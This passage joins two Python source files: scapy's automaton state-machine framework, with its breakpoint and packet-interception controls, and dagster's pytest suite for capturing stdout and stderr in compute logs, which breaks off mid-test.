return self.__self__.add_breakpoints(self.__func__)
def intercepts(self):
return self.__self__.add_interception_points(self.__func__)
def unbreaks(self):
return self.__self__.remove_breakpoints(self.__func__)
def unintercepts(self):
return self.__self__.remove_interception_points(self.__func__)
##############
# Automata #
##############
class ATMT:
STATE = "State"
ACTION = "Action"
CONDITION = "Condition"
RECV = "Receive condition"
TIMEOUT = "Timeout condition"
IOEVENT = "I/O event"
class NewStateRequested(Exception):
def __init__(self, state_func, automaton, *args, **kargs):
self.func = state_func
self.state = state_func.atmt_state
self.initial = state_func.atmt_initial
self.error = state_func.atmt_error
self.final = state_func.atmt_final
Exception.__init__(self, "Request state [%s]" % self.state)
self.automaton = automaton
self.args = args
self.kargs = kargs
self.action_parameters() # init action parameters
def action_parameters(self, *args, **kargs):
self.action_args = args
self.action_kargs = kargs
return self
def run(self):
return self.func(self.automaton, *self.args, **self.kargs)
def __repr__(self):
return "NewStateRequested(%s)" % self.state
@staticmethod
def state(initial=0, final=0, error=0):
def deco(f, initial=initial, final=final):
f.atmt_type = ATMT.STATE
f.atmt_state = f.__name__
f.atmt_initial = initial
f.atmt_final = final
f.atmt_error = error
def state_wrapper(self, *args, **kargs):
return ATMT.NewStateRequested(f, self, *args, **kargs)
state_wrapper.__name__ = "%s_wrapper" % f.__name__
state_wrapper.atmt_type = ATMT.STATE
state_wrapper.atmt_state = f.__name__
state_wrapper.atmt_initial = initial
state_wrapper.atmt_final = final
state_wrapper.atmt_error = error
state_wrapper.atmt_origfunc = f
return state_wrapper
return deco
@staticmethod
def action(cond, prio=0):
def deco(f, cond=cond):
if not hasattr(f, "atmt_type"):
f.atmt_cond = {}
f.atmt_type = ATMT.ACTION
f.atmt_cond[cond.atmt_condname] = prio
return f
return deco
@staticmethod
def condition(state, prio=0):
def deco(f, state=state):
f.atmt_type = ATMT.CONDITION
f.atmt_state = state.atmt_state
f.atmt_condname = f.__name__
f.atmt_prio = prio
return f
return deco
@staticmethod
def receive_condition(state, prio=0):
def deco(f, state=state):
f.atmt_type = ATMT.RECV
f.atmt_state = state.atmt_state
f.atmt_condname = f.__name__
f.atmt_prio = prio
return f
return deco
@staticmethod
def ioevent(state, name, prio=0, as_supersocket=None):
def deco(f, state=state):
f.atmt_type = ATMT.IOEVENT
f.atmt_state = state.atmt_state
f.atmt_condname = f.__name__
f.atmt_ioname = name
f.atmt_prio = prio
f.atmt_as_supersocket = as_supersocket
return f
return deco
@staticmethod
def timeout(state, timeout):
def deco(f, state=state, timeout=timeout):
f.atmt_type = ATMT.TIMEOUT
f.atmt_state = state.atmt_state
f.atmt_timeout = timeout
f.atmt_condname = f.__name__
return f
return deco
class _ATMT_Command:
RUN = "RUN"
NEXT = "NEXT"
FREEZE = "FREEZE"
STOP = "STOP"
END = "END"
EXCEPTION = "EXCEPTION"
SINGLESTEP = "SINGLESTEP"
BREAKPOINT = "BREAKPOINT"
INTERCEPT = "INTERCEPT"
ACCEPT = "ACCEPT"
REPLACE = "REPLACE"
REJECT = "REJECT"
class _ATMT_supersocket(SuperSocket, SelectableObject):
def __init__(self, name, ioevent, automaton, proto, *args, **kargs):
SelectableObject.__init__(self)
self.name = name
self.ioevent = ioevent
self.proto = proto
# write, read
self.spa, self.spb = ObjectPipe(), ObjectPipe()
# Register recv hook
self.spb.register_hook(self.call_release)
kargs["external_fd"] = {ioevent: (self.spa, self.spb)}
self.atmt = automaton(*args, **kargs)
self.atmt.runbg()
def fileno(self):
return self.spb.fileno()
def send(self, s):
if not isinstance(s, bytes):
s = bytes(s)
return self.spa.send(s)
def check_recv(self):
return self.spb.check_recv()
def recv(self, n=MTU):
r = self.spb.recv(n)
if self.proto is not None:
r = self.proto(r)
return r
def close(self):
pass
@staticmethod
def select(sockets, remain=conf.recv_poll_rate):
return select_objects(sockets, remain), None
class _ATMT_to_supersocket:
def __init__(self, name, ioevent, automaton):
self.name = name
self.ioevent = ioevent
self.automaton = automaton
def __call__(self, proto, *args, **kargs):
return _ATMT_supersocket(
self.name, self.ioevent, self.automaton,
proto, *args, **kargs
)
class Automaton_metaclass(type):
def __new__(cls, name, bases, dct):
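        # Walk the class and its bases, collect every method decorated with ATMT.* into lookup tables
        # (states, immediate/receive/io/timeout conditions, and the actions attached to each condition),
        # then sort them by priority.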
cls = super(Automaton_metaclass, cls).__new__(cls, name, bases, dct)
cls.states = {}
cls.state = None
cls.recv_conditions = {}
cls.conditions = {}
cls.ioevents = {}
cls.timeout = {}
cls.actions = {}
cls.initial_states = []
cls.ionames = []
cls.iosupersockets = []
members = {}
classes = [cls]
while classes:
c = classes.pop(0) # order is important to avoid breaking method overloading # noqa: E501
classes += list(c.__bases__)
for k, v in six.iteritems(c.__dict__):
if k not in members:
members[k] = v
decorated = [v for v in six.itervalues(members)
if isinstance(v, types.FunctionType) and hasattr(v, "atmt_type")] # noqa: E501
for m in decorated:
if m.atmt_type == ATMT.STATE:
s = m.atmt_state
cls.states[s] = m
cls.recv_conditions[s] = []
cls.ioevents[s] = []
cls.conditions[s] = []
cls.timeout[s] = []
if m.atmt_initial:
cls.initial_states.append(m)
elif m.atmt_type in [ATMT.CONDITION, ATMT.RECV, ATMT.TIMEOUT, ATMT.IOEVENT]: # noqa: E501
cls.actions[m.atmt_condname] = []
for m in decorated:
if m.atmt_type == ATMT.CONDITION:
cls.conditions[m.atmt_state].append(m)
elif m.atmt_type == ATMT.RECV:
cls.recv_conditions[m.atmt_state].append(m)
elif m.atmt_type == ATMT.IOEVENT:
cls.ioevents[m.atmt_state].append(m)
cls.ionames.append(m.atmt_ioname)
if m.atmt_as_supersocket is not None:
cls.iosupersockets.append(m)
elif m.atmt_type == ATMT.TIMEOUT:
cls.timeout[m.atmt_state].append((m.atmt_timeout, m))
elif m.atmt_type == ATMT.ACTION:
for c in m.atmt_cond:
cls.actions[c].append(m)
for v in six.itervalues(cls.timeout):
v.sort(key=lambda x: x[0])
v.append((None, None))
for v in itertools.chain(six.itervalues(cls.conditions),
six.itervalues(cls.recv_conditions),
six.itervalues(cls.ioevents)):
v.sort(key=lambda x: x.atmt_prio)
for condname, actlst in six.iteritems(cls.actions):
actlst.sort(key=lambda x: x.atmt_cond[condname])
for ioev in cls.iosupersockets:
setattr(cls, ioev.atmt_as_supersocket, _ATMT_to_supersocket(ioev.atmt_as_supersocket, ioev.atmt_ioname, cls)) # noqa: E501
return cls
def build_graph(self):
s = 'digraph "%s" {\n' % self.__class__.__name__
se = "" # Keep initial nodes at the beginning for better rendering
for st in six.itervalues(self.states):
if st.atmt_initial:
se = ('\t"%s" [ style=filled, fillcolor=blue, shape=box, root=true];\n' % st.atmt_state) + se # noqa: E501
elif st.atmt_final:
se += '\t"%s" [ style=filled, fillcolor=green, shape=octagon ];\n' % st.atmt_state # noqa: E501
elif st.atmt_error:
se += '\t"%s" [ style=filled, fillcolor=red, shape=octagon ];\n' % st.atmt_state # noqa: E501
s += se
for st in six.itervalues(self.states):
for n in st.atmt_origfunc.__code__.co_names + st.atmt_origfunc.__code__.co_consts: # noqa: E501
if n in self.states:
s += '\t"%s" -> "%s" [ color=green ];\n' % (st.atmt_state, n) # noqa: E501
for c, k, v in ([("purple", k, v) for k, v in self.conditions.items()] + # noqa: E501
[("red", k, v) for k, v in self.recv_conditions.items()] + # noqa: E501
[("orange", k, v) for k, v in self.ioevents.items()]):
for f in v:
for n in f.__code__.co_names + f.__code__.co_consts:
if n in self.states:
line = f.atmt_condname
for x in self.actions[f.atmt_condname]:
line += "\\l>[%s]" % x.__name__
s += '\t"%s" -> "%s" [label="%s", color=%s];\n' % (k, n, line, c) # noqa: E501
for k, v in six.iteritems(self.timeout):
for t, f in v:
if f is None:
continue
for n in f.__code__.co_names + f.__code__.co_consts:
if n in self.states:
line = "%s/%.1fs" % (f.atmt_condname, t)
for x in self.actions[f.atmt_condname]:
line += "\\l>[%s]" % x.__name__
s += '\t"%s" -> "%s" [label="%s",color=blue];\n' % (k, n, line) # noqa: E501
s += "}\n"
return s
def graph(self, **kargs):
s = self.build_graph()
return do_graph(s, **kargs)
class Automaton(six.with_metaclass(Automaton_metaclass)):
def parse_args(self, debug=0, store=1, **kargs):
self.debug_level = debug
self.socket_kargs = kargs
self.store_packets = store
def master_filter(self, pkt):
return True
def my_send(self, pkt):
self.send_sock.send(pkt)
# Utility classes and exceptions
class _IO_fdwrapper(SelectableObject):
def __init__(self, rd, wr):
if rd is not None and not isinstance(rd, (int, ObjectPipe)):
rd = rd.fileno()
if wr is not None and not isinstance(wr, (int, ObjectPipe)):
wr = wr.fileno()
self.rd = rd
self.wr = wr
SelectableObject.__init__(self)
def fileno(self):
if isinstance(self.rd, ObjectPipe):
return self.rd.fileno()
return self.rd
def check_recv(self):
return self.rd.check_recv()
def read(self, n=65535):
if isinstance(self.rd, ObjectPipe):
return self.rd.recv(n)
return os.read(self.rd, n)
def write(self, msg):
self.call_release()
if isinstance(self.wr, ObjectPipe):
self.wr.send(msg)
return
return os.write(self.wr, msg)
def recv(self, n=65535):
return self.read(n)
def send(self, msg):
return self.write(msg)
class _IO_mixer(SelectableObject):
def __init__(self, rd, wr):
self.rd = rd
self.wr = wr
SelectableObject.__init__(self)
def fileno(self):
if isinstance(self.rd, int):
return self.rd
return self.rd.fileno()
def check_recv(self):
return self.rd.check_recv()
def recv(self, n=None):
return self.rd.recv(n)
def read(self, n=None):
return self.recv(n)
def send(self, msg):
self.wr.send(msg)
return self.call_release()
def write(self, msg):
return self.send(msg)
class AutomatonException(Exception):
def __init__(self, msg, state=None, result=None):
Exception.__init__(self, msg)
self.state = state
self.result = result
class AutomatonError(AutomatonException):
pass
class ErrorState(AutomatonException):
pass
class Stuck(AutomatonException):
pass
class AutomatonStopped(AutomatonException):
pass
class Breakpoint(AutomatonStopped):
pass
class Singlestep(AutomatonStopped):
pass
class InterceptionPoint(AutomatonStopped):
def __init__(self, msg, state=None, result=None, packet=None):
Automaton.AutomatonStopped.__init__(self, msg, state=state, result=result) # noqa: E501
self.packet = packet
class CommandMessage(AutomatonException):
pass
# Services
def debug(self, lvl, msg):
if self.debug_level >= lvl:
log_interactive.debug(msg)
def send(self, pkt):
if self.state.state in self.interception_points:
self.debug(3, "INTERCEPT: packet intercepted: %s" % pkt.summary())
self.intercepted_packet = pkt
cmd = Message(type=_ATMT_Command.INTERCEPT, state=self.state, pkt=pkt) # noqa: E501
self.cmdout.send(cmd)
cmd = self.cmdin.recv()
self.intercepted_packet = None
if cmd.type == _ATMT_Command.REJECT:
self.debug(3, "INTERCEPT: packet rejected")
return
elif cmd.type == _ATMT_Command.REPLACE:
pkt = cmd.pkt
self.debug(3, "INTERCEPT: packet replaced by: %s" % pkt.summary()) # noqa: E501
elif cmd.type == _ATMT_Command.ACCEPT:
self.debug(3, "INTERCEPT: packet accepted")
else:
raise self.AutomatonError("INTERCEPT: unknown verdict: %r" % cmd.type) # noqa: E501
self.my_send(pkt)
self.debug(3, "SENT : %s" % pkt.summary())
if self.store_packets:
self.packets.append(pkt.copy())
# Internals
def __init__(self, *args, **kargs):
external_fd = kargs.pop("external_fd", {})
self.send_sock_class = kargs.pop("ll", conf.L3socket)
self.recv_sock_class = kargs.pop("recvsock", conf.L2listen)
self.started = threading.Lock()
self.threadid = None
self.breakpointed = None
self.breakpoints = set()
self.interception_points = set()
self.intercepted_packet = None
self.debug_level = 0
self.init_args = args
self.init_kargs = kargs
self.io = type.__new__(type, "IOnamespace", (), {})
self.oi = type.__new__(type, "IOnamespace", (), {})
self.cmdin = ObjectPipe()
self.cmdout = ObjectPipe()
self.ioin = {}
self.ioout = {}
for n in self.ionames:
extfd = external_fd.get(n)
if not isinstance(extfd, tuple):
extfd = (extfd, extfd)
ioin, ioout = extfd
if ioin is None:
ioin = ObjectPipe()
elif not isinstance(ioin, SelectableObject):
ioin = self._IO_fdwrapper(ioin, None)
if ioout is None:
ioout = ObjectPipe()
elif not isinstance(ioout, SelectableObject):
ioout = self._IO_fdwrapper(None, ioout)
self.ioin[n] = ioin
self.ioout[n] = ioout
ioin.ioname = n
ioout.ioname = n
setattr(self.io, n, self._IO_mixer(ioout, ioin))
setattr(self.oi, n, self._IO_mixer(ioin, ioout))
for stname in self.states:
setattr(self, stname,
_instance_state(getattr(self, stname)))
self.start()
def __iter__(self):
return self
def __del__(self):
self.stop()
def _run_condition(self, cond, *args, **kargs):
try:
self.debug(5, "Trying %s [%s]" % (cond.atmt_type, cond.atmt_condname)) # noqa: E501
cond(self, *args, **kargs)
except ATMT.NewStateRequested as state_req:
self.debug(2, "%s [%s] taken to state [%s]" % (cond.atmt_type, cond.atmt_condname, state_req.state)) # noqa: E501
if cond.atmt_type == ATMT.RECV:
if self.store_packets:
self.packets.append(args[0])
for action in self.actions[cond.atmt_condname]:
self.debug(2, " + Running action [%s]" % action.__name__)
action(self, *state_req.action_args, **state_req.action_kargs)
raise
except Exception as e:
self.debug(2, "%s [%s] raised exception [%s]" % (cond.atmt_type, cond.atmt_condname, e)) # noqa: E501
raise
else:
self.debug(2, "%s [%s] not taken" % (cond.atmt_type, cond.atmt_condname)) # noqa: E501
def _do_start(self, *args, **kargs):
ready = threading.Event()
_t = threading.Thread(target=self._do_control, args=(ready,) + (args), kwargs=kargs) # noqa: E501
_t.setDaemon(True)
_t.start()
ready.wait()
def _do_control(self, ready, *args, **kargs):
with self.started:
self.threadid = threading.currentThread().ident
# Update default parameters
a = args + self.init_args[len(args):]
k = self.init_kargs.copy()
k.update(kargs)
self.parse_args(*a, **k)
# Start the automaton
self.state = self.initial_states[0](self)
self.send_sock = self.send_sock_class(**self.socket_kargs)
self.listen_sock = self.recv_sock_class(**self.socket_kargs)
self.packets = PacketList(name="session[%s]" % self.__class__.__name__) # noqa: E501
singlestep = True
iterator = self._do_iter()
self.debug(3, "Starting control thread [tid=%i]" % self.threadid)
# Sync threads
ready.set()
try:
while True:
c = self.cmdin.recv()
self.debug(5, "Received command %s" % c.type)
if c.type == _ATMT_Command.RUN:
singlestep = False
elif c.type == _ATMT_Command.NEXT:
singlestep = True
elif c.type == _ATMT_Command.FREEZE:
continue
elif c.type == _ATMT_Command.STOP:
break
while True:
state = next(iterator)
if isinstance(state, self.CommandMessage):
break
elif isinstance(state, self.Breakpoint):
c = Message(type=_ATMT_Command.BREAKPOINT, state=state) # noqa: E501
self.cmdout.send(c)
break
if singlestep:
c = Message(type=_ATMT_Command.SINGLESTEP, state=state) # noqa: E501
self.cmdout.send(c)
break
except (StopIteration, RuntimeError):
c = Message(type=_ATMT_Command.END,
result=self.final_state_output)
self.cmdout.send(c)
except Exception as e:
exc_info = sys.exc_info()
self.debug(3, "Transferring exception from tid=%i:\n%s" % (self.threadid, traceback.format_exception(*exc_info))) # noqa: E501
m = Message(type=_ATMT_Command.EXCEPTION, exception=e, exc_info=exc_info) # noqa: E501
self.cmdout.send(m)
self.debug(3, "Stopping control thread (tid=%i)" % self.threadid)
self.threadid = None
def _do_iter(self):
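        # Generator that drives the automaton: run the current state, evaluate its immediate conditions,
        # then wait on received packets, I/O events and timeouts until a transition
        # (ATMT.NewStateRequested) is raised and yielded back to the control thread.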
while True:
try:
self.debug(1, "## state=[%s]" % self.state.state)
# Entering a new state. First, call new state function
if self.state.state in self.breakpoints and self.state.state != self.breakpointed: # noqa: E501
self.breakpointed = self.state.state
yield self.Breakpoint("breakpoint triggered on state %s" % self.state.state, # noqa: E501
state=self.state.state)
self.breakpointed = None
state_output = self.state.run()
if self.state.error:
raise self.ErrorState("Reached %s: [%r]" % (self.state.state, state_output), # noqa: E501
result=state_output, state=self.state.state) # noqa: E501
if self.state.final:
self.final_state_output = state_output
return
if state_output is None:
state_output = ()
elif not isinstance(state_output, list):
state_output = state_output,
# Then check immediate conditions
for cond in self.conditions[self.state.state]:
self._run_condition(cond, *state_output)
# If still there and no conditions left, we are stuck!
if (len(self.recv_conditions[self.state.state]) == 0 and
len(self.ioevents[self.state.state]) == 0 and
len(self.timeout[self.state.state]) == 1):
raise self.Stuck("stuck in [%s]" % self.state.state,
state=self.state.state, result=state_output) # noqa: E501
# Finally listen and pay attention to timeouts
expirations = iter(self.timeout[self.state.state])
next_timeout, timeout_func = next(expirations)
t0 = time.time()
fds = [self.cmdin]
if len(self.recv_conditions[self.state.state]) > 0:
fds.append(self.listen_sock)
for ioev in self.ioevents[self.state.state]:
fds.append(self.ioin[ioev.atmt_ioname])
while True:
t = time.time() - t0
if next_timeout is not None:
if next_timeout <= t:
self._run_condition(timeout_func, *state_output)
next_timeout, timeout_func = next(expirations)
if next_timeout is None:
remain = None
else:
remain = next_timeout - t
self.debug(5, "Select on %r" % fds)
r = select_objects(fds, remain)
self.debug(5, "Selected %r" % r)
for fd in r:
self.debug(5, "Looking at %r" % fd)
if fd == self.cmdin:
yield self.CommandMessage("Received command message") # noqa: E501
elif fd == self.listen_sock:
try:
pkt = self.listen_sock.recv(MTU)
except recv_error:
pass
else:
if pkt is not None:
if self.master_filter(pkt):
self.debug(3, "RECVD: %s" % pkt.summary()) # noqa: E501
for rcvcond in self.recv_conditions[self.state.state]: # noqa: E501
self._run_condition(rcvcond, pkt, *state_output) # noqa: E501
else:
self.debug(4, "FILTR: %s" % pkt.summary()) # noqa: E501
else:
self.debug(3, "IOEVENT on %s" % fd.ioname)
for ioevt in self.ioevents[self.state.state]:
if ioevt.atmt_ioname == fd.ioname:
self._run_condition(ioevt, fd, *state_output) # noqa: E501
except ATMT.NewStateRequested as state_req:
self.debug(2, "switching from [%s] to [%s]" % (self.state.state, state_req.state)) # noqa: E501
self.state = state_req
yield state_req
# Public API
def add_interception_points(self, *ipts):
for ipt in ipts:
if hasattr(ipt, "atmt_state"):
ipt = ipt.atmt_state
self.interception_points.add(ipt)
def remove_interception_points(self, *ipts):
for ipt in ipts:
if hasattr(ipt, "atmt_state"):
ipt = ipt.atmt_state
self.interception_points.discard(ipt)
def add_breakpoints(self, *bps):
for bp in bps:
if hasattr(bp, "atmt_state"):
bp = bp.atmt_state
self.breakpoints.add(bp)
def remove_breakpoints(self, *bps):
for bp in bps:
if hasattr(bp, "atmt_state"):
bp = bp.atmt_state
self.breakpoints.discard(bp)
def start(self, *args, **kargs):
if not self.started.locked():
self._do_start(*args, **kargs)
def run(self, resume=None, wait=True):
if resume is None:
resume = Message(type=_ATMT_Command.RUN)
self.cmdin.send(resume)
if wait:
try:
c = self.cmdout.recv()
except KeyboardInterrupt:
self.cmdin.send(Message(type=_ATMT_Command.FREEZE))
return
if c.type == _ATMT_Command.END:
return c.result
elif c.type == _ATMT_Command.INTERCEPT:
raise self.InterceptionPoint("packet intercepted", state=c.state.state, packet=c.pkt) # noqa: E501
elif c.type == _ATMT_Command.SINGLESTEP:
raise self.Singlestep("singlestep state=[%s]" % c.state.state, state=c.state.state) # noqa: E501
elif c.type == _ATMT_Command.BREAKPOINT:
raise self.Breakpoint("breakpoint triggered on state [%s]" % c.state.state, state=c.state.state) # noqa: E501
elif c.type == _ATMT_Command.EXCEPTION:
six.reraise(c.exc_info[0], c.exc_info[1], c.exc_info[2])
def runbg(self, resume=None, wait=False):
self.run(resume, wait)
def next(self):
return self.run(resume=Message(type=_ATMT_Command.NEXT))
__next__ = next
def stop(self):
self.cmdin.send(Message(type=_ATMT_Command.STOP))
with self.started:
# Flush command pipes
while True:
r = select_objects([self.cmdin, self.cmdout], 0)
if not r:
break
for fd in r:
fd.recv()
def restart(self, *args, **kargs):
self.stop()
self.start(*args, **kargs)
def accept_packet(self, pkt=None, wait=False):
rsm = Message()
if pkt is None:
rsm.type = _ATMT_Command.ACCEPT
else:
rsm.type = _ATMT_Command.REPLACE
rsm.pkt = pkt
return self.run(resume=rsm, wait=wait)
def reject_packet(self, wait=False):
rsm = Message(type=_ATMT_Command.REJECT)
return self.run(resume=rsm, wait=wait)
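# Usage sketch (the classic example from the scapy documentation, reproduced here only as an illustration):
# states are declared with @ATMT.state, transitions with @ATMT.condition, and side effects with @ATMT.action.
#
#     class HelloWorld(Automaton):
#         @ATMT.state(initial=1)
#         def BEGIN(self):
#             print("State=BEGIN")
#         @ATMT.condition(BEGIN)
#         def wait_for_nothing(self):
#             print("Wait for nothing...")
#             raise self.END()
#         @ATMT.action(wait_for_nothing)
#         def on_nothing(self):
#             print("Action on 'nothing' condition")
#         @ATMT.state(final=1)
#         def END(self):
#             print("State=END")
#
#     HelloWorld().run()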
|
test_stdout.py
|
import multiprocessing
import os
import random
import string
import sys
import tempfile
import time
import pytest
from dagster import (
DagsterEventType,
InputDefinition,
ModeDefinition,
execute_pipeline,
fs_io_manager,
pipeline,
reconstructable,
resource,
solid,
)
from dagster.core.execution.compute_logs import should_disable_io_stream_redirect
from dagster.core.instance import DagsterInstance
from dagster.core.storage.compute_log_manager import ComputeIOType
from dagster.core.test_utils import create_run_for_test, instance_for_test
from dagster.utils import ensure_dir, touch_file
HELLO_SOLID = "HELLO SOLID"
HELLO_RESOURCE = "HELLO RESOURCE"
SEPARATOR = os.linesep if (os.name == "nt" and sys.version_info < (3,)) else "\n"
@resource
def resource_a(_):
print(HELLO_RESOURCE) # pylint: disable=print-call
return "A"
@solid
def spawn(_):
return 1
@solid(input_defs=[InputDefinition("num", int)], required_resource_keys={"a"})
def spew(_, num):
print(HELLO_SOLID) # pylint: disable=print-call
return num
def define_pipeline():
@pipeline(
mode_defs=[ModeDefinition(resource_defs={"a": resource_a, "io_manager": fs_io_manager})]
)
def spew_pipeline():
spew(spew(spawn()))
return spew_pipeline
def normalize_file_content(s):
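    # normalize platform line endings and drop blank lines so captured output compares exactly across OSes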
return "\n".join([line for line in s.replace(os.linesep, "\n").split("\n") if line])
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_to_disk():
with instance_for_test() as instance:
spew_pipeline = define_pipeline()
manager = instance.compute_log_manager
result = execute_pipeline(spew_pipeline, instance=instance)
assert result.success
compute_steps = [
event.step_key
for event in result.step_event_list
if event.event_type == DagsterEventType.STEP_START
]
for step_key in compute_steps:
if step_key.startswith("spawn"):
continue
compute_io_path = manager.get_local_path(result.run_id, step_key, ComputeIOType.STDOUT)
assert os.path.exists(compute_io_path)
with open(compute_io_path, "r") as stdout_file:
assert normalize_file_content(stdout_file.read()) == HELLO_SOLID
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_to_disk_multiprocess():
spew_pipeline = reconstructable(define_pipeline)
with instance_for_test() as instance:
manager = instance.compute_log_manager
result = execute_pipeline(
spew_pipeline,
run_config={"execution": {"multiprocess": {}}},
instance=instance,
)
assert result.success
compute_steps = [
event.step_key
for event in result.step_event_list
if event.event_type == DagsterEventType.STEP_START
]
for step_key in compute_steps:
if step_key.startswith("spawn"):
continue
compute_io_path = manager.get_local_path(result.run_id, step_key, ComputeIOType.STDOUT)
assert os.path.exists(compute_io_path)
with open(compute_io_path, "r") as stdout_file:
assert normalize_file_content(stdout_file.read()) == HELLO_SOLID
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_manager():
with instance_for_test() as instance:
manager = instance.compute_log_manager
spew_pipeline = define_pipeline()
result = execute_pipeline(spew_pipeline, instance=instance)
assert result.success
compute_steps = [
event.step_key
for event in result.step_event_list
if event.event_type == DagsterEventType.STEP_START
]
assert len(compute_steps) == 3
step_key = "spew"
assert manager.is_watch_completed(result.run_id, step_key)
stdout = manager.read_logs_file(result.run_id, step_key, ComputeIOType.STDOUT)
assert normalize_file_content(stdout.data) == HELLO_SOLID
stderr = manager.read_logs_file(result.run_id, step_key, ComputeIOType.STDERR)
cleaned_logs = stderr.data.replace("\x1b[34m", "").replace("\x1b[0m", "")
assert "dagster - DEBUG - spew_pipeline - " in cleaned_logs
bad_logs = manager.read_logs_file("not_a_run_id", step_key, ComputeIOType.STDOUT)
assert bad_logs.data is None
assert not manager.is_watch_completed("not_a_run_id", step_key)
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_manager_subscriptions():
with instance_for_test() as instance:
spew_pipeline = define_pipeline()
step_key = "spew"
result = execute_pipeline(spew_pipeline, instance=instance)
stdout_observable = instance.compute_log_manager.observable(
result.run_id, step_key, ComputeIOType.STDOUT
)
stderr_observable = instance.compute_log_manager.observable(
result.run_id, step_key, ComputeIOType.STDERR
)
stdout = []
stdout_observable.subscribe(stdout.append)
stderr = []
stderr_observable.subscribe(stderr.append)
assert len(stdout) == 1
assert stdout[0].data.startswith(HELLO_SOLID)
assert stdout[0].cursor in [12, 13]
assert len(stderr) == 1
assert stderr[0].cursor == len(stderr[0].data)
assert stderr[0].cursor > 400
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_manager_subscription_updates():
from dagster.core.storage.local_compute_log_manager import LocalComputeLogManager
with tempfile.TemporaryDirectory() as temp_dir:
compute_log_manager = LocalComputeLogManager(temp_dir, polling_timeout=0.5)
run_id = "fake_run_id"
step_key = "spew"
stdout_path = compute_log_manager.get_local_path(run_id, step_key, ComputeIOType.STDOUT)
        # make sure the parent directory to be watched and the file itself both exist
ensure_dir(os.path.dirname(stdout_path))
touch_file(stdout_path)
# set up the subscription
messages = []
observable = compute_log_manager.observable(run_id, step_key, ComputeIOType.STDOUT)
observable.subscribe(messages.append)
# returns a single update, with 0 data
assert len(messages) == 1
last_chunk = messages[-1]
assert not last_chunk.data
assert last_chunk.cursor == 0
with open(stdout_path, "a+") as f:
print(HELLO_SOLID, file=f) # pylint:disable=print-call
# wait longer than the watchdog timeout
time.sleep(1)
assert len(messages) == 2
last_chunk = messages[-1]
assert last_chunk.data
assert last_chunk.cursor > 0
def gen_solid_name(length):
return "".join(random.choice(string.ascii_lowercase) for x in range(length))
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_long_solid_names():
solid_name = gen_solid_name(300)
@pipeline(mode_defs=[ModeDefinition(resource_defs={"a": resource_a})])
def long_pipeline():
spew.alias(name=solid_name)()
with instance_for_test() as instance:
manager = instance.compute_log_manager
result = execute_pipeline(
long_pipeline,
instance=instance,
run_config={"solids": {solid_name: {"inputs": {"num": 1}}}},
)
assert result.success
compute_steps = [
event.step_key
for event in result.step_event_list
if event.event_type == DagsterEventType.STEP_START
]
assert len(compute_steps) == 1
step_key = compute_steps[0]
assert manager.is_watch_completed(result.run_id, step_key)
stdout = manager.read_logs_file(result.run_id, step_key, ComputeIOType.STDOUT)
assert normalize_file_content(stdout.data) == HELLO_SOLID
def execute_inner(step_key, pipeline_run, instance_ref):
instance = DagsterInstance.from_ref(instance_ref)
inner_step(instance, pipeline_run, step_key)
def inner_step(instance, pipeline_run, step_key):
with instance.compute_log_manager.watch(pipeline_run, step_key=step_key):
time.sleep(0.1)
print(step_key, "inner 1") # pylint: disable=print-call
print(step_key, "inner 2") # pylint: disable=print-call
print(step_key, "inner 3") # pylint: disable=print-call
time.sleep(0.1)
def expected_inner_output(step_key):
return "\n".join(
["{step_key} inner {num}".format(step_key=step_key, num=i + 1) for i in range(3)]
)
def expected_outer_prefix():
return "\n".join(["outer {num}".format(num=i + 1) for i in range(3)])
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_single():
with instance_for_test() as instance:
pipeline_name = "foo_pipeline"
pipeline_run = create_run_for_test(instance, pipeline_name=pipeline_name)
step_keys = ["A", "B", "C"]
with instance.compute_log_manager.watch(pipeline_run):
print("outer 1") # pylint: disable=print-call
print("outer 2") # pylint: disable=print-call
print("outer 3") # pylint: disable=print-call
for step_key in step_keys:
inner_step(instance, pipeline_run, step_key)
for step_key in step_keys:
stdout = instance.compute_log_manager.read_logs_file(
pipeline_run.run_id, step_key, ComputeIOType.STDOUT
)
assert normalize_file_content(stdout.data) == expected_inner_output(step_key)
full_out = instance.compute_log_manager.read_logs_file(
pipeline_run.run_id, pipeline_name, ComputeIOType.STDOUT
)
assert normalize_file_content(full_out.data).startswith(expected_outer_prefix())
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_base_with_spaces():
with tempfile.TemporaryDirectory() as temp_dir:
with instance_for_test(
temp_dir=temp_dir,
overrides={
"compute_logs": {
"module": "dagster.core.storage.local_compute_log_manager",
"class": "LocalComputeLogManager",
"config": {"base_dir": os.path.join(temp_dir, "base with spaces")},
}
},
) as instance:
pipeline_name = "foo_pipeline"
pipeline_run = create_run_for_test(instance, pipeline_name=pipeline_name)
step_keys = ["A", "B", "C"]
with instance.compute_log_manager.watch(pipeline_run):
print("outer 1") # pylint: disable=print-call
print("outer 2") # pylint: disable=print-call
print("outer 3") # pylint: disable=print-call
for step_key in step_keys:
inner_step(instance, pipeline_run, step_key)
for step_key in step_keys:
stdout = instance.compute_log_manager.read_logs_file(
pipeline_run.run_id, step_key, ComputeIOType.STDOUT
)
assert normalize_file_content(stdout.data) == expected_inner_output(step_key)
full_out = instance.compute_log_manager.read_logs_file(
pipeline_run.run_id, pipeline_name, ComputeIOType.STDOUT
)
assert normalize_file_content(full_out.data).startswith(expected_outer_prefix())
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_multi():
ctx = multiprocessing.get_context("spawn")
with instance_for_test() as instance:
pipeline_name = "foo_pipeline"
pipeline_run = create_run_for_test(instance, pipeline_name=pipeline_name)
step_keys = ["A", "B", "C"]
with instance.compute_log_manager.watch(pipeline_run):
print("outer 1") # pylint: disable=print-call
print("outer 2") # pylint: disable=print-call
print("outer 3") # pylint: disable=print-call
for step_key in step_keys:
process = ctx.Process(
